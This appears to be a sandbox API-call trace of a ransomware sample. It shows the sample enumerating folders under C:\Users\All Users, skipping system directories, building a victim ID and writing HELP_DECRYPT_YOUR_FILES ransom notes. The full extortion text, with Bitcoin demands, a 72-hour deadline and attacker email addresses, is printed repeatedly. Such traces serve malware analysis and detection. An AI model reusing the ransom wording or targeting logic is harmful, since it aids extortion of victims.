	[0158.444] lstrcatW (in: lpString1="C:\\Users\\All Users\\", lpString2="HELP_DECRYPT_YOUR_FILES.TXT" | out: lpString1="C:\\Users\\All Users\\HELP_DECRYPT_YOUR_FILES.TXT") returned="C:\\Users\\All Users\\HELP_DECRYPT_YOUR_FILES.TXT"
	[0158.444] lstrlenW (lpString="C:\\Users\\All Users\\HELP_DECRYPT_YOUR_FILES.TXT") returned 46
	[0158.444] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0158.444] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\HELP_DECRYPT_YOUR_FILES.TXT", cchLength=0x2e | out: lpsz="c:\\users\\all users\\help_decrypt_your_files.txt") returned 0x2e
	[0158.444] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.444] StrStrW (lpFirst="c:\\users\\all users\\help_decrypt_your_files.txt", lpSrch="help_decrypt_your_files") returned="help_decrypt_your_files.txt"
	[0158.444] FindNextFileW (in: hFindFile=0xfb97b0, lpFindFileData=0x18d5c4 | out: lpFindFileData=0x18d5c4*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x1b54cf26, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x1b54cf26, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 1
	[0158.444] FindNextFileW (in: hFindFile=0xfb97b0, lpFindFileData=0x18d5c4 | out: lpFindFileData=0x18d5c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x506a2e14, ftCreationTime.dwHighDateTime=0x1d8a64c, ftLastAccessTime.dwLowDateTime=0xfd4aa69b, ftLastAccessTime.dwHighDateTime=0x1d8a64c, ftLastWriteTime.dwLowDateTime=0xfd4aa69b, ftLastWriteTime.dwHighDateTime=0x1d8a64c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft Help", cAlternateFileName="MICROS~3")) returned 1
	[0158.445] FindNextFileW (in: hFindFile=0xfb97b0, lpFindFileData=0x18d5c4 | out: lpFindFileData=0x18d5c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x87b95643, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x87b95643, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x87b95643, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft OneDrive", cAlternateFileName="MICROS~2")) returned 1
	[0158.445] FindNextFileW (in: hFindFile=0xfb97b0, lpFindFileData=0x18d5c4 | out: lpFindFileData=0x18d5c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa4af3a5b, ftCreationTime.dwHighDateTime=0x1d8c106, ftLastAccessTime.dwLowDateTime=0xa4af3a5b, ftLastAccessTime.dwHighDateTime=0x1d8c106, ftLastWriteTime.dwLowDateTime=0xa4af3a5b, ftLastWriteTime.dwHighDateTime=0x1d8c106, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Oracle", cAlternateFileName="")) returned 1
	[0158.445] FindNextFileW (in: hFindFile=0xfb97b0, lpFindFileData=0x18d5c4 | out: lpFindFileData=0x18d5c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x387f5bb4, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x6be8870b, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x6be8870b, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Package Cache", cAlternateFileName="PACKAG~1")) returned 1
	[0158.445] FindNextFileW (in: hFindFile=0xfb97b0, lpFindFileData=0x18d5c4 | out: lpFindFileData=0x18d5c4*(dwFileAttributes=0x30, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbc2dd99f, ftLastAccessTime.dwHighDateTime=0x1d8a64c, ftLastWriteTime.dwLowDateTime=0xbc2dd99f, ftLastWriteTime.dwHighDateTime=0x1d8a64c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="regid.1991-06.com.microsoft", cAlternateFileName="REGID1~1.MIC")) returned 1
	[0158.445] FindNextFileW (in: hFindFile=0xfb97b0, lpFindFileData=0x18d5c4 | out: lpFindFileData=0x18d5c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd78854, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd78854, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SoftwareDistribution", cAlternateFileName="SOFTWA~1")) returned 1
	[0158.445] FindNextFileW (in: hFindFile=0xfb97b0, lpFindFileData=0x18d5c4 | out: lpFindFileData=0x18d5c4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x5d599f22, ftCreationTime.dwHighDateTime=0x1d7005f, ftLastAccessTime.dwLowDateTime=0x5d599f22, ftLastAccessTime.dwHighDateTime=0x1d7005f, ftLastWriteTime.dwLowDateTime=0x5d599f22, ftLastWriteTime.dwHighDateTime=0x1d7005f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Start Menu", cAlternateFileName="STARTM~1")) returned 1
	[0158.445] FindNextFileW (in: hFindFile=0xfb97b0, lpFindFileData=0x18d5c4 | out: lpFindFileData=0x18d5c4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x5d599f22, ftCreationTime.dwHighDateTime=0x1d7005f, ftLastAccessTime.dwLowDateTime=0x5d599f22, ftLastAccessTime.dwHighDateTime=0x1d7005f, ftLastWriteTime.dwLowDateTime=0x5d599f22, ftLastWriteTime.dwHighDateTime=0x1d7005f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Templates", cAlternateFileName="TEMPLA~1")) returned 1
	[0158.445] FindNextFileW (in: hFindFile=0xfb97b0, lpFindFileData=0x18d5c4 | out: lpFindFileData=0x18d5c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xf99491c3, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xf99491c3, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="USOPrivate", cAlternateFileName="USOPRI~1")) returned 1
	[0158.445] FindNextFileW (in: hFindFile=0xfb97b0, lpFindFileData=0x18d5c4 | out: lpFindFileData=0x18d5c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf97592c3, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xf97592c3, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xf97592c3, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="USOShared", cAlternateFileName="USOSHA~1")) returned 1
	[0158.445] FindNextFileW (in: hFindFile=0xfb97b0, lpFindFileData=0x18d5c4 | out: lpFindFileData=0x18d5c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf97592c3, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xf97592c3, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xf97592c3, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="USOShared", cAlternateFileName="USOSHA~1")) returned 0
	[0158.446] FindClose (in: hFindFile=0xfb97b0 | out: hFindFile=0xfb97b0) returned 1
	[0158.446] FindClose (in: hFindFile=0xfb97b0 | out: hFindFile=0xfb97b0) returned 0
	[0158.452] lstrcpyW (in: lpString1=0x18d1b4, lpString2="C:\\Users\\All Users" | out: lpString1="C:\\Users\\All Users") returned="C:\\Users\\All Users"
	[0158.452] lstrcatW (in: lpString1="C:\\Users\\All Users", lpString2="\\*.*" | out: lpString1="C:\\Users\\All Users\\*.*") returned="C:\\Users\\All Users\\*.*"
	[0158.452] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0158.453] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0158.453] wsprintfW (in: param_1=0x18caa0, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\All Users\\HELP_DECRYPT_YOUR_FILES.TXT") returned 46
	[0158.453] CreateFileW (lpFileName="C:\\Users\\All Users\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x37c
	[0158.456] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0158.456] WriteFile (in: hFile=0x37c, lpBuffer=0x18be58*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18cd7c, lpOverlapped=0x0 | out: lpBuffer=0x18be58*, lpNumberOfBytesWritten=0x18cd7c*=0xc46, lpOverlapped=0x0) returned 1
	[0158.459] CloseHandle (hObject=0x37c) returned 1
	[0158.460] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18be28, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18be28*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0158.460] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0158.460] GetUserNameA (in: lpBuffer=0x18bd0c, pcbBuffer=0x18be24 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18be24) returned 1
	[0158.471] wsprintfW (in: param_1=0x18cca8, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0158.471] CreateFileW (lpFileName="C:\\Users\\All Users\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x37c
	[0158.472] SetFilePointer (in: hFile=0x37c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0158.472] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0158.472] WriteFile (in: hFile=0x37c, lpBuffer=0x18cca8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x18cd84, lpOverlapped=0x0 | out: lpBuffer=0x18cca8*, lpNumberOfBytesWritten=0x18cd84*=0x30, lpOverlapped=0x0) returned 1
	[0158.472] CloseHandle (hObject=0x37c) returned 1
	[0158.473] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0158.474] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0158.474] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0158.474] wsprintfW (in: param_1=0x18ca60, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\All Users\\HELP_DECRYPT_YOUR_FILES.HTML") returned 47
	[0158.474] CreateFileW (lpFileName="C:\\Users\\All Users\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x37c
	[0158.477] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0158.477] WriteFile (in: hFile=0x37c, lpBuffer=0x18c254*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x18cd78, lpOverlapped=0x0 | out: lpBuffer=0x18c254*, lpNumberOfBytesWritten=0x18cd78*=0x808, lpOverlapped=0x0) returned 1
	[0158.488] CloseHandle (hObject=0x37c) returned 1
	[0158.488] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0158.489] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18c23c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18c23c*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0158.489] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0158.490] GetUserNameA (in: lpBuffer=0x18c120, pcbBuffer=0x18c238 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18c238) returned 1
	[0158.491] wsprintfA (in: param_1=0x18cc68, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0158.491] CreateFileW (lpFileName="C:\\Users\\All Users\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x37c
	[0158.492] SetFilePointer (in: hFile=0x37c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0158.492] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0158.492] WriteFile (in: hFile=0x37c, lpBuffer=0x18cc68*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x18cd80, lpOverlapped=0x0 | out: lpBuffer=0x18cc68*, lpNumberOfBytesWritten=0x18cd80*=0x43, lpOverlapped=0x0) returned 1
	[0158.492] CloseHandle (hObject=0x37c) returned 1
	[0158.493] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\*.*" (normalized: "c:\\users\\all users\\*.*"), lpFindFileData=0x18d5c4 | out: lpFindFileData=0x18d5c4*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xcb9c8f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x77c1d81c, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x77c1d81c, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb97b0
	[0158.495] lstrlenW (lpString="C:\\Users\\All Users\\*.*") returned 22
	[0158.495] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0158.496] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\*.*", cchLength=0x16 | out: lpsz="c:\\users\\all users\\*.*") returned 0x16
	[0158.496] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.496] StrStrW (lpFirst="c:\\users\\all users\\*.*", lpSrch="windows") returned 0x0
	[0158.496] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.496] StrStrW (lpFirst="c:\\users\\all users\\*.*", lpSrch="boot") returned 0x0
	[0158.496] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.496] StrStrW (lpFirst="c:\\users\\all users\\*.*", lpSrch="system volume information") returned 0x0
	[0158.497] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.497] StrStrW (lpFirst="c:\\users\\all users\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0158.497] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.497] StrStrW (lpFirst="c:\\users\\all users\\*.*", lpSrch="temp") returned 0x0
	[0158.497] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.497] StrStrW (lpFirst="c:\\users\\all users\\*.*", lpSrch="program files") returned 0x0
	[0158.497] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.498] StrStrW (lpFirst="c:\\users\\all users\\*.*", lpSrch="program files (x86)") returned 0x0
	[0158.498] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.498] StrStrW (lpFirst="c:\\users\\all users\\*.*", lpSrch="appdata") returned 0x0
	[0158.498] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.498] StrStrW (lpFirst="c:\\users\\all users\\*.*", lpSrch="application data") returned 0x0
	[0158.498] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.499] StrStrW (lpFirst="c:\\users\\all users\\*.*", lpSrch="winnt") returned 0x0
	[0158.499] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.499] StrStrW (lpFirst="c:\\users\\all users\\*.*", lpSrch="tmp") returned 0x0
	[0158.499] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.499] StrStrW (lpFirst="c:\\users\\all users\\*.*", lpSrch="cache") returned 0x0
	[0158.499] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.500] StrStrW (lpFirst="c:\\users\\all users\\*.*", lpSrch="temporary internet files") returned 0x0
	[0158.500] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.500] StrStrW (lpFirst="c:\\users\\all users\\*.*", lpSrch="webcache") returned 0x0
	[0158.500] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.500] StrStrW (lpFirst="c:\\users\\all users\\*.*", lpSrch="inetcache") returned 0x0
	[0158.500] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.500] StrStrW (lpFirst="c:\\users\\all users\\*.*", lpSrch="nvidia") returned 0x0
	[0158.501] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.501] StrStrW (lpFirst="c:\\users\\all users\\*.*", lpSrch="packages") returned 0x0
	[0158.501] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.501] StrStrW (lpFirst="c:\\users\\all users\\*.*", lpSrch="cookies") returned 0x0
	[0158.501] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.501] StrStrW (lpFirst="c:\\users\\all users\\*.*", lpSrch="programdata") returned 0x0
	[0158.501] lstrcmpW (lpString1=".", lpString2="..") returned -1
	[0158.502] lstrcmpW (lpString1=".", lpString2=".") returned 0
	[0158.502] FindNextFileW (in: hFindFile=0xfb97b0, lpFindFileData=0x18d5c4 | out: lpFindFileData=0x18d5c4*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xcb9c8f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x77c1d81c, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x77c1d81c, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0158.502] lstrcmpW (lpString1="..", lpString2="..") returned 0
	[0158.502] FindNextFileW (in: hFindFile=0xfb97b0, lpFindFileData=0x18d5c4 | out: lpFindFileData=0x18d5c4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x5d599f22, ftCreationTime.dwHighDateTime=0x1d7005f, ftLastAccessTime.dwLowDateTime=0x5d599f22, ftLastAccessTime.dwHighDateTime=0x1d7005f, ftLastWriteTime.dwLowDateTime=0x5d599f22, ftLastWriteTime.dwHighDateTime=0x1d7005f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Application Data", cAlternateFileName="APPLIC~1")) returned 1
	[0158.502] lstrcmpW (lpString1="Application Data", lpString2="..") returned 1
	[0158.502] lstrcmpW (lpString1="Application Data", lpString2=".") returned 1
	[0158.502] lstrcpyW (in: lpString1=0x18cfac, lpString2="C:\\Users\\All Users" | out: lpString1="C:\\Users\\All Users") returned="C:\\Users\\All Users"
	[0158.503] lstrcatW (in: lpString1="C:\\Users\\All Users", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\") returned="C:\\Users\\All Users\\"
	[0158.503] lstrcatW (in: lpString1="C:\\Users\\All Users\\", lpString2="Application Data" | out: lpString1="C:\\Users\\All Users\\Application Data") returned="C:\\Users\\All Users\\Application Data"
	[0158.503] lstrcpyW (in: lpString1=0x18c4a4, lpString2="C:\\Users\\All Users\\Application Data" | out: lpString1="C:\\Users\\All Users\\Application Data") returned="C:\\Users\\All Users\\Application Data"
	[0158.503] lstrcatW (in: lpString1="C:\\Users\\All Users\\Application Data", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Application Data\\") returned="C:\\Users\\All Users\\Application Data\\"
	[0158.503] lstrcpyW (in: lpString1=0x18c094, lpString2="C:\\Users\\All Users\\Application Data\\" | out: lpString1="C:\\Users\\All Users\\Application Data\\") returned="C:\\Users\\All Users\\Application Data\\"
	[0158.503] lstrcatW (in: lpString1="C:\\Users\\All Users\\Application Data\\", lpString2="*.*" | out: lpString1="C:\\Users\\All Users\\Application Data\\*.*") returned="C:\\Users\\All Users\\Application Data\\*.*"
	[0158.503] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\*.*" (normalized: "c:\\users\\all users\\application data\\*.*"), lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="shell32.dll")) returned 0xffffffff
	[0158.504] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0
	[0158.504] lstrcpyW (in: lpString1=0x18c4a4, lpString2="C:\\Users\\All Users\\Application Data" | out: lpString1="C:\\Users\\All Users\\Application Data") returned="C:\\Users\\All Users\\Application Data"
	[0158.504] lstrcatW (in: lpString1="C:\\Users\\All Users\\Application Data", lpString2="\\*.*" | out: lpString1="C:\\Users\\All Users\\Application Data\\*.*") returned="C:\\Users\\All Users\\Application Data\\*.*"
	[0158.504] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0158.505] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0158.505] wsprintfW (in: param_1=0x18bd90, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\All Users\\Application Data\\HELP_DECRYPT_YOUR_FILES.TXT") returned 63
	[0158.505] CreateFileW (lpFileName="C:\\Users\\All Users\\Application Data\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\application data\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0158.508] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0158.508] WriteFile (in: hFile=0x380, lpBuffer=0x18b148*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18c06c, lpOverlapped=0x0 | out: lpBuffer=0x18b148*, lpNumberOfBytesWritten=0x18c06c*=0xc46, lpOverlapped=0x0) returned 1
	[0158.512] CloseHandle (hObject=0x380) returned 1
